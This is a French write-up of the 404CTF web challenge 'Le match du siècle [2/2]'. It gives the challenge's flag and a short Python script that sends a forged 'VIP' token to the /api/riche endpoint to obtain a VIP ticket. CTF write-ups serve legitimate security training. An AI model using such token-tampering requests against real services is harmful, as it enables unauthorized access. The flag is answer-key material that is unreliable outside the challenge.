Le match du siècle [2/2]

404CTF{b7554ee60d0020216749d428830a55f1}

PrécédentExploit mag SuivantLE GORFOU 42

Dernière mise à jour il y a 1 an

Cet article vous a-t-il été utile ?

Le match du siècle [2/2]

404CTF{b7554ee60d0020216749d428830a55f1}

Catégorie: Web Difficulté: medium Flag: -

Challenge

Description

Vous avez déjà en votre possession un billet, néanmoins, pour impressionner votre famille, vous souhaiteriez des places VIP.

Connexion:

Ce challenge tourne sur un docker et n'est pas disponible

Solution

Analyse des requêtes

Dans le challenge précédent, on pouvait voir qu'en cliquant sur le bouton "Obtenir" d'un de nos billets, une requête POST sur /api/riche était faite avec le nom du ticket comme token pour récupérer le flag.

Il suffit donc de faire la même requête avec pour token, le ticket VIP :

import requests
from PIL import Image
from io import BytesIO


def main() -> None:
	url = 'https://le-match-du-siecle.challenges.404ctf.fr'
	response = requests.post(f'{url}/api/riche', json={"token":"VIP"})
	Image.open(BytesIO(response.content)).show()


if __name__ == '__main__':
	main()

PrécédentExploit mag SuivantLE GORFOU 42

Dernière mise à jour il y a 1 an

Cet article vous a-t-il été utile ?